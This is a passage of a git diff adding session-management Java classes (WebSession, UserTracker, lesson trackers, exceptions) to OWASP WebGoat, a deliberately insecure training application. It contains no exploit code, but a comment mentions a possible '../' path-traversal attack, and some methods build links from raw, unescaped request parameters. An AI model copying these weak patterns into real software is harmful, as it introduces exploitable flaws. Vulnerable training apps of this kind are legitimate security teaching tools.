+     *  Description of the Method
+     *
+     * @param  out  Description of the Parameter
+     */
+
+    public void output(PrintWriter out)
+    {
+
+	// format output -- then send to printwriter
+
+	// otherwise we're doing way too much SSL encryption work
+
+	out.print(content.toString());
+
+    }
+
+
+    public String getContent()
+    {
+	return (content == null) ? "" : content.toString();
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  x  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+
+    protected static String pad(int x)
+    {
+
+	StringBuffer sb = new StringBuffer();
+
+	if (x < 10)
+	{
+
+	    sb.append(" ");
+
+	}
+
+	if (x < 100)
+	{
+
+	    sb.append(" ");
+
+	}
+
+	sb.append(x);
+
+	return (sb.toString());
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  token  Description of the Parameter
+     * @return        Description of the Return Value
+     */
+    protected static String convertMetachars(String token)
+    {
+
+	int mci = 0;
+
+	/*
+	 *  meta char array
+	 * 
+	 * FIXME: Removed the conversion of whitespace " " to "&nbsp" in order for the 
+	 * html to be automatically wrapped in client browser. It is better to add line 
+	 * length checking and only do "&nbsp" conversion in lines that won't exceed 
+	 * screen size, say less than 80 characters.     
+	 */
+	String[] metaChar = { "&", "<", ">", "\"", "\t",
+		System.getProperty("line.separator") };
+
+	String[] htmlCode = { "&amp;", "&lt;", "&gt;", "&quot;", "    ", "<br>" };
+
+	String replacedString = token;
+	for (; mci < metaChar.length; mci += 1)
+	{
+	    replacedString = replacedString.replaceAll(metaChar[mci],
+		    htmlCode[mci]);
+	}
+	return (replacedString);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  token  Description of the Parameter
+     * @return        Description of the Return Value
+     */
+    protected static String convertMetacharsJavaCode(String token)
+    {
+	return (convertMetachars(token).replaceAll(" ", "&nbsp;"));
+    }
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+
+    //protected abstract Element wrapForm( WebSession s );
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/SequentialLessonTracker.java b/main/project/JavaSource/org/owasp/webgoat/session/SequentialLessonTracker.java
new file mode 100755
index 000000000..bf0e1102f
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/SequentialLessonTracker.java
@@ -0,0 +1,39 @@
+package org.owasp.webgoat.session;
+
+import java.util.Properties;
+
+public class SequentialLessonTracker extends LessonTracker {
+
+    private int currentStage = 1;
+
+
+
+    public int getStage()
+    {
+	return currentStage;
+    }
+
+
+    public void setStage(int stage)
+    {
+	currentStage = stage;
+    }
+
+    protected void setProperties(Properties props, Screen screen)
+    {
+    super.setProperties(props, screen);
+	currentStage = Integer.parseInt(props.getProperty(screen.getTitle()
+		+ ".currentStage"));
+    }
+    
+    public void store(WebSession s, Screen screen, String user)
+    {
+	lessonProperties.setProperty(screen.getTitle() + ".currentStage",
+		Integer.toString(currentStage));
+	super.store(s, screen, user);
+    }
+    
+    public String toString() {
+    	return super.toString() + "    - currentStage:....... " + currentStage + "\n";
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/UnauthenticatedException.java b/main/project/JavaSource/org/owasp/webgoat/session/UnauthenticatedException.java
new file mode 100644
index 000000000..efd610750
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/UnauthenticatedException.java
@@ -0,0 +1,40 @@
+package org.owasp.webgoat.session;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class UnauthenticatedException extends Exception
+{
+
+	/**
+	 * 
+	 */
+	private static final long serialVersionUID = 97865025446819061L;
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/UnauthorizedException.java b/main/project/JavaSource/org/owasp/webgoat/session/UnauthorizedException.java
new file mode 100644
index 000000000..d05532419
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/UnauthorizedException.java
@@ -0,0 +1,40 @@
+package org.owasp.webgoat.session;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class UnauthorizedException extends Exception
+{
+
+	/**
+	 * 
+	 */
+	private static final long serialVersionUID = 5245519486798464814L;
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/UserTracker.java b/main/project/JavaSource/org/owasp/webgoat/session/UserTracker.java
new file mode 100644
index 000000000..91808d020
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/UserTracker.java
@@ -0,0 +1,273 @@
+package org.owasp.webgoat.session;
+
+import java.util.ArrayList;
+import java.util.Collection;
+import java.util.HashMap;
+import java.util.Iterator;
+import java.util.Map;
+
+import org.apache.catalina.Role;
+import org.apache.catalina.User;
+import org.apache.catalina.users.MemoryUserDatabase;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created    October 29, 2003
+ */
+
+public class UserTracker
+{
+
+    private static UserTracker instance;
+
+    // FIXME: persist this somehow!
+
+    private static HashMap<String, HashMap<String, LessonTracker>> storage = new HashMap<String, HashMap<String, LessonTracker>>();
+
+    private static MemoryUserDatabase usersDB = new MemoryUserDatabase();
+
+
+    /**
+     *  Constructor for the UserTracker object
+     */
+    private UserTracker()
+    {}
+
+
+    /**
+     *  Gets the completed attribute of the UserTracker object
+     *
+     * @param  userName  Description of the Parameter
+     * @return           The completed value
+     */
+    public int getCompleted(String userName)
+    {
+
+	HashMap usermap = getUserMap(userName);
+
+	Iterator i = usermap.entrySet().iterator();
+
+	int count = 0;
+
+	while (i.hasNext())
+	{
+
+	    Map.Entry entry = (Map.Entry) i.next();
+
+	    int value = ((Integer) entry.getValue()).intValue();
+
+	    if (value > 5)
+	    {
+		count++;
+	    }
+
+	}
+
+	return count;
+    }
+
+
+    /**
+     *  Gets the users attribute of the UserTracker object
+     *
+     * @return    The users value
+     */
+    public Collection getUsers()
+    {
+	return storage.keySet();
+    }
+
+
+    public Collection<String> getAllUsers(String roleName)
+    {
+	synchronized (usersDB)
+	{
+	    Collection<String> allUsers = new ArrayList<String>();
+	    try
+	    {
+		usersDB.open();
+		Iterator users = usersDB.getUsers();
+		while (users.hasNext())
+		{
+		    User user = (User) users.next();
+		    Iterator roles = user.getRoles();
+		    while (roles.hasNext())
+		    {
+			Role role = (Role) roles.next();
+			if (role.getRolename().trim().equals(roleName))
+			{
+			    allUsers.add(user.getUsername());
+			}
+		    }
+		}
+		usersDB.close();
+	    }
+	    catch (Exception e)
+	    {}
+	    return allUsers;
+	}
+    }
+
+
+    public void deleteUser(String user)
+    {
+	synchronized (usersDB)
+	{
+	    try
+	    {
+		usersDB.open();
+		Iterator users = usersDB.getUsers();
+		while (users.hasNext())
+		{
+		    User tomcatUser = (User) users.next();
+		    if (tomcatUser.getUsername().equals(user))
+		    {
+			usersDB.removeUser(tomcatUser);
+			// FIXME: delete all the lesson tracking property files
+			break;
+		    }
+		}
+		usersDB.close();
+
+	    }
+	    catch (Exception e)
+	    {}
+	}
+    }
+
+
+    /**
+     *  Gets the lessonTracker attribute of the UserTracker object
+     *
+     * @param  screen    Description of the Parameter
+     * @param  userName  Description of the Parameter
+     * @return           The lessonTracker value
+     */
+    public LessonTracker getLessonTracker(WebSession s, Screen screen)
+    {
+	return getLessonTracker(s, s.getUserName(), screen);
+    }
+
+
+    public LessonTracker getLessonTracker(WebSession s, String user,
+	    Screen screen)
+    {
+	HashMap<String, LessonTracker> usermap = getUserMap(user);
+	LessonTracker tracker = (LessonTracker) usermap.get(screen.getTitle());
+	if (tracker == null)
+	{
+	    // Creates a new lesson tracker, if one does not exist on disk.
+	    tracker = LessonTracker.load(s, user, screen);
+	    usermap.put(screen.getTitle(), tracker);
+	}
+	//System.out.println( "User: [" + userName + "] UserTracker:getLessonTracker() LTH " + tracker.hashCode() + " for " + screen );
+	return tracker;
+    }
+
+
+    /**
+     *  Gets the status attribute of the UserTracker object
+     *
+     * @param  screen    Description of the Parameter
+     * @param  userName  Description of the Parameter
+     * @return           The status value
+     */
+    public String getStatus(WebSession s, Screen screen)
+    {
+	return ("User [" + s.getUserName() + "] has accessed " + screen
+		+ " UserTracker:getStatus()LTH = " + getLessonTracker(s, screen)
+		.hashCode());
+    }
+
+
+    /**
+     *  Gets the userMap attribute of the UserTracker object
+     *
+     * @param  userName  Description of the Parameter
+     * @return           The userMap value
+     */
+    private HashMap<String, LessonTracker> getUserMap(String userName)
+    {
+
+	HashMap<String, LessonTracker> usermap = storage.get(userName);
+
+	if (usermap == null)
+	{
+
+	    usermap = new HashMap<String, LessonTracker>();
+
+	    storage.put(userName, usermap);
+
+	}
+
+	return (usermap);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @return    Description of the Return Value
+     */
+    public static synchronized UserTracker instance()
+    {
+
+	if (instance == null)
+	{
+
+	    instance = new UserTracker();
+
+	}
+
+	return instance;
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  screen  Description of the Parameter
+     * @param  s       Description of the Parameter
+     */
+    public void update(WebSession s, Screen screen)
+    {
+
+	LessonTracker tracker = getLessonTracker(s, screen);
+
+	//System.out.println( "User [" + s.getUserName() + "] TRACKER: updating " + screen + " LTH " + tracker.hashCode() );
+	tracker.store(s, screen);
+
+	HashMap<String, LessonTracker> usermap = getUserMap(s.getUserName());
+	usermap.put(screen.getTitle(), tracker);
+
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/ValidationException.java b/main/project/JavaSource/org/owasp/webgoat/session/ValidationException.java
new file mode 100644
index 000000000..e34b28b2c
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/ValidationException.java
@@ -0,0 +1,51 @@
+package org.owasp.webgoat.session;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class ValidationException extends Exception
+{
+
+    /**
+	 * 
+	 */
+	private static final long serialVersionUID = -8358754606830400708L;
+
+
+	public ValidationException()
+    {
+	super();
+    }
+
+
+    public ValidationException(String message)
+    {
+	super(message);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/WebSession.java b/main/project/JavaSource/org/owasp/webgoat/session/WebSession.java
new file mode 100644
index 000000000..3320558ea
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/WebSession.java
@@ -0,0 +1,1069 @@
+package org.owasp.webgoat.session;
+
+import java.io.IOException;
+import java.io.PrintWriter;
+import java.sql.Connection;
+import java.sql.SQLException;
+import java.util.ArrayList;
+import java.util.Arrays;
+import java.util.Collections;
+import java.util.Enumeration;
+import java.util.HashMap;
+import java.util.Hashtable;
+import java.util.List;
+import java.util.Map;
+import java.util.Vector;
+
+import javax.servlet.ServletContext;
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+import org.owasp.webgoat.lessons.AbstractLesson;
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.RandomLessonAdapter;
+import org.owasp.webgoat.lessons.SequentialLessonAdapter;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * 
+ * @created October 28, 2003
+ */
+public class WebSession
+{
+	/**
+	 * Description of the Field
+	 */
+	public final static String ADMIN = "admin";
+
+	/**
+	 * Tomcat role for a webgoat user
+	 */
+	public final static String WEBGOAT_USER = "webgoat_user";
+
+	/**
+	 * Tomcat role for a webgoat admin
+	 */
+	public final static String WEBGOAT_ADMIN = "webgoat_admin";
+
+	/**
+	 * Description of the Field
+	 */
+	public final static String CHALLENGE = "Challenge";
+
+	/**
+	 * Description of the Field
+	 */
+	public final static String COLOR = "color";
+
+	/**
+	 * Description of the Field
+	 */
+	public final static int ERROR = 0;
+
+	public static final String STAGE = "stage";
+
+	/**
+	 * Description of the Field
+	 */
+	public final static String JSESSION_ID = "jsessionid";
+
+	/**
+	 * Description of the Field
+	 */
+	public final static String LOGOUT = "Logout";
+
+	/**
+	 * Description of the Field
+	 */
+	public final static String RESTART = "Restart";
+
+
+	/**
+	 * Description of the Field
+	 */
+	public final static String MENU = "menu";
+
+	/**
+	 * Description of the Field
+	 */
+	public final static String SCREEN = "Screen";
+
+	/**
+	 * Description of the Field
+	 */
+	public final static String SESSION = "Session";
+
+	public final static String SHOWSOURCE = "ShowSource";
+	
+	public final static String SHOWSOLUTION = "ShowSolution";
+	
+	public final static String SHOWHINTS = "ShowHints";
+
+	public final static String SHOW = "show";
+
+	public final static String SHOW_NEXTHINT = "NextHint";
+
+	public final static String SHOW_PREVIOUSHINT = "PreviousHint";
+
+	public final static String SHOW_PARAMS = "Params";
+
+	public final static String SHOW_COOKIES = "Cookies";
+
+	public final static String SHOW_SOURCE = "Source";
+
+	public final static String SHOW_SOLUTION = "Solution";
+
+	public final static String DEBUG = "debug";
+
+	/**
+	 * Description of the Field
+	 */
+	public final static int WELCOME = -1;
+
+	private WebgoatContext webgoatContext;
+	
+	private ServletContext context = null;
+
+	private Course course;
+
+	private int currentScreen = WELCOME;
+
+	private int previousScreen = ERROR;
+
+	private int hintNum = -1;
+
+	private boolean isAdmin = false;
+
+	private boolean isHackedAdmin = false;
+
+	private boolean isAuthenticated = false;
+
+	private boolean isColor = false;
+
+	private boolean isDebug = false;
+	private boolean hasHackedHackableAdmin = false;
+
+	private StringBuffer message = new StringBuffer( "" );
+
+	private ParameterParser myParser;
+
+	private HttpServletRequest request = null;
+
+	private HttpServletResponse response = null;
+
+	private String servletName;
+
+	private HashMap<String,Object> session = new HashMap<String, Object>();
+
+	private boolean showCookies = false;
+
+	private boolean showParams = false;
+
+	private boolean showRequest = false;
+
+	private boolean showSource = false;
+
+	private boolean showSolution = false;
+
+	private boolean completedHackableAdmin = false;
+	
+	private int currentMenu;
+
+	/**
+	 * Constructor for the WebSession object
+	 * 
+	 * @param servlet Description of the Parameter
+	 * @param context Description of the Parameter
+	 */
+	public WebSession(WebgoatContext webgoatContext, ServletContext context )
+	{
+		this.webgoatContext = webgoatContext;
+		// initialize from web.xml
+		showParams = webgoatContext.isShowParams();
+		showCookies = webgoatContext.isShowCookies();
+		showSource = webgoatContext.isShowSource();
+		showSolution = webgoatContext.isShowSolution();
+		showRequest = webgoatContext.isShowRequest();
+		this.context = context;
+		course = new Course();
+		course.loadCourses( webgoatContext, context, "/" );
+	}
+
+	public static synchronized Connection getConnection(WebSession s) 
+			throws SQLException, ClassNotFoundException
+	{
+		return DatabaseUtilities.getConnection(s);
+	}
+
+	public static void returnConnection(WebSession s) {
+		DatabaseUtilities.returnConnection(s.getUserName());
+	}
+	
+	/**
+	 * Description of the Method
+	 * 
+	 * @param key Description of the Parameter
+	 * @param value Description of the Parameter
+	 */
+	public void add( String key, Object value )
+	{
+		session.put( key, value );
+	}
+
+	/**
+	 * Description of the Method
+	 */
+	public void clearMessage()
+	{
+		message.setLength( 0 );
+	}
+
+	/**
+	 * Description of the Method
+	 */
+	public void eatCookies()
+	{
+		Cookie[] cookies = request.getCookies();
+
+		for ( int loop = 0; loop < cookies.length; loop++ )
+		{
+			if ( !cookies[loop].getName().startsWith( "JS" ) )
+			{// skip jsessionid cookie
+				cookies[loop].setMaxAge( 0 );// mark for deletion by browser
+				response.addCookie( cookies[loop] );
+			}
+		}
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param key Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public Object get( String key )
+	{
+		return ( session.get( key ) );
+	}
+
+	/**
+	 * Gets the context attribute of the WebSession object
+	 * 
+	 * @return The context value
+	 */
+	public ServletContext getContext()
+	{
+		return context;
+	}
+
+	public List<String> getRoles()
+	{
+		List<String> roles = new ArrayList<String>();
+
+		roles.add(AbstractLesson.USER_ROLE);
+		if (isAdmin())
+		{
+			roles.add(AbstractLesson.ADMIN_ROLE);
+		}
+		
+		return roles;
+	}
+	
+	public String getRole()
+	{
+		
+		String role = "";
+		if (isAdmin())
+		{
+			role = AbstractLesson.ADMIN_ROLE;
+		}
+		else if (isHackedAdmin())
+		{
+			role = AbstractLesson.HACKED_ADMIN_ROLE;
+		} 
+		else if (isChallenge())
+		{
+			role = AbstractLesson.CHALLENGE_ROLE;
+		}
+		else
+		{
+			role = AbstractLesson.USER_ROLE;
+		}
+		
+		return role;
+	}
+	
+	/**
+	 * Gets the course attribute of the WebSession object
+	 * 
+	 * @return The course value
+	 */
+	public Course getCourse()
+	{
+		return course;
+	}
+
+	public void setCourse( Course course )
+	{
+		this.course = course;
+	}
+
+	/**
+	 * Gets the currentScreen attribute of the WebSession object
+	 * 
+	 * @return The currentScreen value
+	 */
+	public int getCurrentScreen()
+	{
+		return ( currentScreen );
+	}
+
+	public void setCurrentScreen( int screen )
+	{
+		currentScreen = screen;
+	}
+
+	public String getRestartLink()
+	{
+		return getCurrentLesson().getLink() + "&" + RESTART + "=" + getCurrentScreen();
+	}
+	
+	public String getCurrentLink()
+	{
+		String thisLink = "attack";
+		Enumeration e = request.getParameterNames();
+		boolean isFirstParameter = true;
+		while (e.hasMoreElements())
+		{
+			String name = (String) e.nextElement();
+			if (isFirstParameter)
+			{
+				isFirstParameter = false;
+				thisLink += "?";
+			}
+			else
+			{
+				thisLink += "&";
+			}
+			thisLink = thisLink + name + "=" + request.getParameter(name);
+		}
+
+		return thisLink;
+	}
+
+	public AbstractLesson getCurrentLesson()
+	{
+		return getCourse().getLesson( this, getCurrentScreen(), getRoles() );
+	}
+	
+	public AbstractLesson getLesson(int id)
+	{
+		return getCourse().getLesson( this, id, getRoles() );
+	}
+	
+	public List<AbstractLesson> getLessons(Category category)
+	{
+		return getCourse().getLessons( this, category, getRoles() );
+	}
+	
+	/**
+	 * Gets the hint1 attribute of the WebSession object
+	 * 
+	 * @return The hint1 value
+	 */
+	private int getHintNum()
+	{
+		return ( hintNum );
+	}
+
+	public String getHint()
+	{
+		String hint = null;
+		int hints = getCurrentLesson().getHintCount(this);
+		if (getHintNum() > hints)
+			hintNum = -1;
+		if ( getHintNum() >= 0 )
+			// FIXME
+			hint = getCurrentLesson().getHint( this, getHintNum() );
+
+		return hint;
+	}
+
+	public List<Parameter> getParams()
+	{
+		Vector<Parameter> params = null;
+
+		if ( showParams() && getParser() != null )
+		{
+			params = new Vector<Parameter>();
+
+			Enumeration e = getParser().getParameterNames();
+
+			while ( ( e != null ) && e.hasMoreElements() )
+			{
+				String name = (String) e.nextElement();
+				String[] values = getParser().getParameterValues( name );
+
+				for ( int loop = 0; ( values != null ) && ( loop < values.length ); loop++ )
+				{
+					params.add( new Parameter( name, values[loop] ) );
+					// params.add( name + " -> " + values[loop] );
+				}
+			}
+
+			Collections.sort( params );
+		}
+
+		return params;
+	}
+
+	public List getCookies()
+	{
+		List cookies = null;
+
+		if ( showCookies() )
+			cookies = Arrays.asList( request.getCookies() );
+
+		/*
+		 * List cookies = new Vector();
+		 * 
+		 * HttpServletRequest request = getRequest(); Cookie[] cookies = request.getCookies();
+		 * 
+		 * if ( cookies.length == 0 ) { list.addElement( new LI( "No Cookies" ) ); }
+		 * 
+		 * for ( int i = 0; i < cookies.length; i++ ) { Cookie cookie = cookies[i];
+		 * cookies.add(cookie); //list.addElement( new LI( cookie.getName() + " -> " +
+		 * cookie.getValue() ) ); }
+		 */
+
+		return cookies;
+	}
+
+	/**
+	 * Gets the cookie attribute of the CookieScreen object
+	 * 
+	 * @param s Description of the Parameter
+	 * @return The cookie value
+	 */
+	public String getCookie( String cookieName )
+	{
+		Cookie[] cookies = getRequest().getCookies();
+
+		for ( int i = 0; i < cookies.length; i++ )
+		{
+			if ( cookies[i].getName().equalsIgnoreCase( cookieName ) )
+			{
+				return ( cookies[i].getValue() );
+			}
+		}
+
+		return ( null );
+	}
+	
+	public String getSource()
+	{
+		return "Sorry.  No Java Source viewing available.";
+		//return getCurrentLesson().getSource(this);
+	}
+
+	public String getSolution()
+	{
+		return "Sorry.  No solution is available.";
+		//return getCurrentLesson().getSolution(this);
+	}
+
+	public String getInstructions()
+	{
+		return getCurrentLesson().getInstructions(this);		
+	}
+	
+	/**
+	 * Gets the message attribute of the WebSession object
+	 * 
+	 * @return The message value
+	 */
+	public String getMessage()
+	{
+		return ( message.toString() );
+	}
+
+	/**
+	 * Gets the parser attribute of the WebSession object
+	 * 
+	 * @return The parser value
+	 */
+	public ParameterParser getParser()
+	{
+		return ( myParser );
+	}
+
+	/**
+	 * Gets the previousScreen attribute of the WebSession object
+	 * 
+	 * @return The previousScreen value
+	 */
+	public int getPreviousScreen()
+	{
+		return ( previousScreen );
+	}
+
+	/**
+	 * Gets the request attribute of the WebSession object
+	 * 
+	 * @return The request value
+	 */
+	public HttpServletRequest getRequest()
+	{
+		return request;
+	}
+
+	public void setRequest( HttpServletRequest request )
+	{
+		this.request = request;
+	}
+
+	/**
+	 * Gets the response attribute of the WebSession object
+	 * 
+	 * @return The response value
+	 */
+	public HttpServletResponse getResponse()
+	{
+		return response;
+	}
+
+	/**
+	 * Gets the servletName attribute of the WebSession object
+	 * 
+	 * @return The servletName value
+	 */
+	public String getServletName()
+	{
+		return ( servletName );
+	}
+
+	/**
+	 * Gets the sourceFile attribute of the WebSession object
+	 * 
+	 * @param screen Description of the Parameter
+	 * @return The sourceFile value
+	 */
+	public String getWebResource( String fileName )
+	{
+		// Note: doesn't work for admin path! Maybe with a ../ attack
+		return ( context.getRealPath( fileName ));
+	}
+
+	/**
+	 * Gets the admin attribute of the WebSession object
+	 * 
+	 * @return The admin value
+	 */
+	public boolean isAdmin()
+	{
+		return ( isAdmin );
+	}
+
+	/**
+	 * Gets the hackedAdmin attribute of the WebSession object
+	 * 
+	 * @return The hackedAdmin value
+	 */
+	public boolean isHackedAdmin()
+	{
+		return ( isHackedAdmin );
+	}
+
+	/**
+	 * Has the user ever hacked the hackable admin
+	 * 
+	 * @return The hackedAdmin value
+	 */
+	public boolean completedHackableAdmin()
+	{
+		return ( completedHackableAdmin );
+	}
+
+	/**
+	 * Gets the authenticated attribute of the WebSession object
+	 * 
+	 * @return The authenticated value
+	 */
+	public boolean isAuthenticated()
+	{
+		return ( isAuthenticated );
+	}
+	
+	private Map<AbstractLesson, LessonSession> lessonSessions = new Hashtable<AbstractLesson, LessonSession>();
+
+	
+	public boolean isAuthenticatedInLesson(AbstractLesson lesson)
+	{
+		boolean authenticated = false;
+		
+		LessonSession lessonSession = getLessonSession(lesson);
+		if (lessonSession != null)
+		{
+			authenticated = lessonSession.isAuthenticated();
+		}
+		//System.out.println("Authenticated for lesson " + lesson + "? " + authenticated);
+		
+		return authenticated;
+	}
+	
+	public boolean isAuthorizedInLesson(int employeeId, String functionId)
+	{
+		return getCurrentLesson().isAuthorized(this, employeeId, functionId);
+	}
+	
+	public boolean isAuthorizedInLesson(String role, String functionId)
+	{
+		return getCurrentLesson().isAuthorized(this, role, functionId);
+	}
+	
+	public int getUserIdInLesson() throws ParameterNotFoundException
+	{
+		return getCurrentLesson().getUserId(this);
+	}
+	
+	public String getUserNameInLesson() throws ParameterNotFoundException
+	{
+		return getCurrentLesson().getUserName(this);
+	}
+
+	public void openLessonSession(AbstractLesson lesson)
+	{
+		System.out.println("Opening new lesson session for lesson " + lesson);
+		LessonSession lessonSession = new LessonSession();
+		lessonSessions.put(lesson, lessonSession);
+	}
+	
+	public void closeLessonSession(AbstractLesson lesson)
+	{
+		lessonSessions.remove(lesson);
+	}
+	
+	public LessonSession getLessonSession(AbstractLesson lesson)
+	{
+		return (LessonSession) lessonSessions.get(lesson);
+	}
+
+	/**
+	 * Gets the challenge attribute of the WebSession object
+	 * 
+	 * @return The challenge value
+	 */
+	public boolean isChallenge()
+	{
+		if ( getCurrentLesson() != null )
+		{
+			return ( Category.CHALLENGE.equals(getCurrentLesson().getCategory()));
+		}
+		return false;
+	}
+
+	/**
+	 * Gets the color attribute of the WebSession object
+	 * 
+	 * @return The color value
+	 */
+	public boolean isColor()
+	{
+		return ( isColor );
+	}
+
+	/**
+	 * Gets the screen attribute of the WebSession object
+	 * 
+	 * @param value Description of the Parameter
+	 * @return The screen value
+	 */
+	public boolean isScreen( int value )
+	{
+		return ( getCurrentScreen() == value );
+	}
+
+	/**
+	 * Gets the user attribute of the WebSession object
+	 * 
+	 * @return The user value
+	 */
+	public boolean isUser()
+	{
+		return ( !isAdmin && !isChallenge() );
+	}
+
+	/**
+	 * Sets the message attribute of the WebSession object
+	 * 
+	 * @param text The new message value
+	 */
+	public void setMessage( String text )
+	{
+		message.append( "<BR>" + " * " + text);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @return Description of the Return Value
+	 */
+	public boolean showCookies()
+	{
+		return ( showCookies );
+	}
+
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @return Description of the Return Value
+	 */
+	public boolean showParams()
+	{
+		return ( showParams );
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @return Description of the Return Value
+	 */
+	public boolean showRequest()
+	{
+		return ( showRequest );
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @return Description of the Return Value
+	 */
+	public boolean showSource()
+	{
+		return ( showSource );
+	}
+
+	public boolean showSolution()
+	{
+		return ( showSolution );
+	}
+
+	/**
+	 * Gets the userName attribute of the WebSession object
+	 * 
+	 * @return The userName value
+	 */
